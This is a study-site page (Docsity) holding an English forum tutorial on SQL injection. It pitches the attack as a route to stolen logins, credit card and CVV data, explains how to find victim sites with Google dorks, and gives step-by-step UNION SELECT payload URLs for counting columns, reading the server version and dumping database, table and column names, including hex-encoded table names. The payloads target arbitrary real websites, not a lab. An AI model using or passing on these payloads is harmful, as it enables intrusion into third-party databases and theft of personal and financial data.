















Prepara tus exámenes y mejora tus resultados gracias a la gran cantidad de recursos disponibles en Docsity
Gana puntos ayudando a otros estudiantes o consíguelos activando un Plan Premium
Prepara tus exámenes
Prepara tus exámenes y mejora tus resultados gracias a la gran cantidad de recursos disponibles en Docsity
Prepara tus exámenes con los documentos que comparten otros estudiantes como tú en Docsity
Encuentra los documentos específicos para los exámenes de tu universidad
Estudia con lecciones y exámenes resueltos basados en los programas académicos de las mejores universidades
Responde a preguntas de exámenes reales y pon a prueba tu preparación
Consigue puntos base para descargar
Gana puntos ayudando a otros estudiantes o consíguelos activando un Plan Premium
Comunidad
Pide ayuda a la comunidad y resuelve tus dudas de estudio
Ebooks gratuitos
Descarga nuestras guías gratuitas sobre técnicas de estudio, métodos para controlar la ansiedad y consejos para la tesis preparadas por los tutores de Docsity
SQL (pronounced "ess-que-el") stands for Structured Query Language. SQL is used to communicate with a database. According to ANSI (American National Standards Institute), it is the standard language for relational database management systems. SQL statements are used to perform tasks such as update data on a database, or retrieve data from a database. Some common relational database management systems that use SQL are: Oracle, Sybase, Microsoft SQL Server, Access, Ingres, etc. Although most datab
Tipo: Guías, Proyectos, Investigaciones
1 / 23
Esta página no es visible en la vista previa
¡No te pierdas las partes importantes!
















www.lossieit.co.uk/forums
CHAPTER 1 - Introduction
SQL (pronounced "ess-que-el") stands for Structured Query Language. SQL is used to communicate with a database. According to ANSI (American National Standards Institute), it is the standard language for relational database management systems. SQL statements are used to perform tasks such as update data on a database, or retrieve data from a database. Some common relational database management systems that use SQL are: Oracle, Sybase, Microsoft SQL Server, Access, Ingres, etc. Although most database systems use SQL, most of them also have their own additional proprietary extensions that are usually only used on their system. However, the standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and "Drop" can be used to accomplish almost everything that one needs to do with a database.
What is SQL?
It is an attack technique used by hackers to exploit web sites by altering backend SQL statements through manipulating application input.
What is an SQL injection?
SQL Injection happens when a developer accepts user input that is directly placed into a SQL Statement and doesn't properly filter out dangerous characters. This can allow an attacker to not only steal data from your database, but also modify and delete it. Certain SQL Servers such as Microsoft SQL Server contain Stored and Extended Procedures (database server functions). If an attacker can obtain access to these Procedures it may be possible to compromise the entire machine. Attackers commonly insert single quotes into a URL's query string, or into a forms input field to test for SQL Injection.
Databases for websites contain a lot of information that could be very useful to an attacker .With such information there are many things you could gain. From usernames and passwords to the sites themselves including the admin details for the site, forum login details. Then we have online shops which store order information such as credit cards details and all associated information such as billing addresses, cvv2 numbers, expiry dates. Also in more malicious circumstances the attacker will gain complete root access to the machine.
What could I gain from doing this?
there email address and password from one website it would be the same for many others including things like PayPal and much more.
A good way to start searching for sites that are vulnerable to SQL injection is Google there are many other ways to find these sites like IRC bots or other search engines as there are many possibilities for finding vulnerable websites please feel free to explore other options as Google is probably the most popular.
How would I find sites that are vulnerable to this attack?
Ok now you have your Google search engine sorted out and ready to go we can jump right in and find some vulnerable sites. We will be using various Google Dorks for this made famous by Johnny Long and his Google Hacking Database (GHDB). The GHDB can be found at the url below and it will be good for you to see what types of things you can find from your search engine queries you will be amazed what Google will index.
CHAPTER 3 - Finding vulnerable sites:
http://johnny.ihackstuff.com/ghdb.php
Also here is a list of Google search operators
http://www.goolag.org/ <----another nice one from cDc
http://www.google.com/help/operators.html
Open up your custom Google home page and try the following examples (this can be edited to whatever you like)
Inurl:php?id=
inurl:php?sid=
inurl:asp?id=
OR
inurl:php?id= site:co.uk (for domain specific sites)
inurl:php?id= site:com
There are many more types of sites that are vulnerable to SQL injections we will be working with these few for now.
So we have a list of sites now let’s try and test them to see if they maybe vulnerable to injection. We do this by adding a ' character to the end of the URL and seeing if we get any form of error message.
CHAPTER 4 – Test if a website is vulnerable
Example: www.site.com/index.php?id=1234'
Error messages will vary from an on screen message or the page may just go blank here are a few examples below.
So now we have found a few sites that throw up errors we will try to identify how many columns are on the site. We do this by using the ORDER BY command. The command can be used in a few variations listed below.
CHAPTER 5 – How many columns?
Example www.site.com/index.php?id=1234+ORDER+BY+1/*
Example www.site.com/index.php?id=1234+ORDER+BY+1--
Example www.site.com/index.php?id=-1+ORDER+BY+1/*
You will be increasing the number 1 looking for the number of columns present on the website. Don’t worry if this sounds complicated at the moment you will soon see how it works with the below examples.
Ok let’s say the site has 18 columns we need to increase the number 1 to find this out I would usually go up in amounts of 10 until I get an error or a blank page like below
Example www.site.com/index.php?id=1234+ORDER+BY+10/*
Example www.site.com/index.php?id=1234+ORDER+BY+10--
Example www.site.com/index.php?id=-1+ORDER+BY+10/*
The page still displays the same with no changes so I increase to 20
Example www.site.com/index.php?id=1234+ORDER+BY+20/*
Example www.site.com/index.php?id=1234+ORDER+BY+20--
Example www.site.com/index.php?id=-1+ORDER+BY+20/*
Now I get an error message that says
Unknown column '20' in 'order clause'
This may show a blank page or another message
So from this information I know there are less than 20 columns, So now I will go down by 5 as I know the number of columns is between 10 and 20
Example www.site.com/index.php?id=1234+ORDER+BY+15/*
Example www.site.com/index.php?id=1234+ORDER+BY+15--
Example www.site.com/index.php?id=-1+ORDER+BY+15/*
Page still displays correctly so I know the number of columns are more than 15 and less than 20
Example www.site.com/index.php?id=1234+ORDER+BY+16/*
Example www.site.com/index.php?id=1234+ORDER+BY+16--
Example www.site.com/index.php?id=-1+ORDER+BY+16/*
Page displays fine
Example www.site.com/index.php?id=1234+ORDER+BY+17/*
Example www.site.com/index.php?id=1234+ORDER+BY+17--
Example www.site.com/index.php?id=-1+ORDER+BY+17/*
Page displays fine
Example www.site.com/index.php?id=1234+ORDER+BY+18/*
Example www.site.com/index.php?id=1234+ORDER+BY+18--
Example www.site.com/index.php?id=-1+ORDER+BY+18/*
Page displays fine
Example www.site.com/index.php?id=1234+ORDER+BY+19/*
Example www.site.com/index.php?id=1234+ORDER+BY+19--
Example www.site.com/index.php?id=-1+ORDER+BY+19/*
I get an error Unknown column '19' in 'order clause'
So this tells us that the number of columns on the website is 18.
So what use is this to us? We can now use another command to find out what columns are vulnerable. By vulnerable I mean what columns will display information on screen for us.
In the above picture you can see columns 2 and 4 are displayed on screen you can use any of these column numbers you see to display data held in the SQL server .You will see this in the next few steps.
We can now see the vulnerable columns displayed on screen we will use them to find out the version of the SQL server running on the website using various commands listed below.
CHAPTER 7 – What Version is Running?
@@version
Version()
concat_ws(0x3a,version(),user(),database())
and
unhex(hex(@@version))
The unhex command at the bottom is used if you encounter an error that looks similar to the one below when you use any of the above version commands.
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
We will need to use one of the above version commands and replace it with the column number shown on screen.
Screen Shots below of different version commands
Above shows a site with 6 columns. Columns 3 and 4 were showing on screen so we would replace @@version with either number 3 or number 4 in the url. In this case it was number 4. This shows that the web server uses SQL server version 5.0.32.
Above is the Illegal mix of collations error below is the unhex(hex(@@version)) command that will display the version number.
Above you can see here that the version of the SQL server is 4.1.
Example url using a site that has 6 columns with columns 3 and 4 vulnerable and showing on screen
www.site.com/index.php?id=1234+AND+1=0+UNION SELECT+ALL+1,2,@@version ,4,5,6/* (column
www.site.com/index.php?id=1234+AND+1=0+UNION SELECT+ALL+1,2,3 ,version(),5,6-- (column 4)
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,3, concat_ws(0x3a,version(),user(),database()),5,6/* (column 4)
www.site.com/index.php?id=1234+AND+1=0+UNION SELECT+ALL+1,2,3unhex(hex(@@version)),4,5,6-- (column 3)
We will be doing the same sort of thing as we do to get the version number by using the exploitable columns that are displayed on screen but we will use this command below. Again our site in this example has 6 columns and column 3 and 4 are vulnerable.
CHAPTER 9 – What Databases are present?
http://site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2, group_concat(schema_name),4 ,5,6+from+information_schema.schemata--
In the place of the vulnerable column in this case number 3 we will use the command
group_concat(schema_name)
and at the end of the columns we will add
+from+information_schema.schemata--
This will display the databases on screen, See the screen shot below
In the example picture above there is 1 database called 7445ftpdb
We could not use the url below on this particular site as it throws up an error
http://site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2, group_concat(schema_name),4 ,5,6+from+information_schema.schemata/*
As you can see above the error above is complaining about the syntax near /* so just change it for –
This site above has a few databases: matrixsa boat fantactics mysql and testfantactics
So we move onto the next step which will be viewing the columns that reside in the table we choose in this case I will choose tbl_accounts but you could choose any table you wished.
CHAPTER 11 – Finding Column names
The command used to view what is inside the tables is usually
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(column_name ),4,5,6+from+information_schema.columns+where+table_name='tbl_accounts'--
Again we replace the vulnerable column number with the following commands.
group_concat(column_name) we will replace column number 3 with this
And add this to the end of the columns
+from+information_schema.columns+where+table_name='tbl_accounts'—
Or we would but this site has thrown an error at us see the image below
As you can see it is not happy with the syntax ‘tbl_accounts’.
If you get an error like this it means you have to encode the table name into hex format to do this you can visit this website below
http://lab.lowsec.org/Encoder/
type tbl_accounts or the table name you are using into the top box and hit encode this will give you this %74%62%6C%5F%61%63%63%6F%75%6E%74%73 we will need to format this correctly.
we will need to remove all the % and add a zero and an x at the front of the hex code so it would look like this 0x74626C5F6163636F756E
So 0x74626C5F6163636F756E7473 = tbl_accounts
Then we would use the following url
www.site.com/index.php?id=1234+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(column_name ),4,5,6+from+information_schema.columns+where+table_name=0x74626C5F6163636F756E7473--
I hope you can see how this works and understand when you will need to use this hex encoding.
You will then be presented with the columns inside the tbl_accounts table.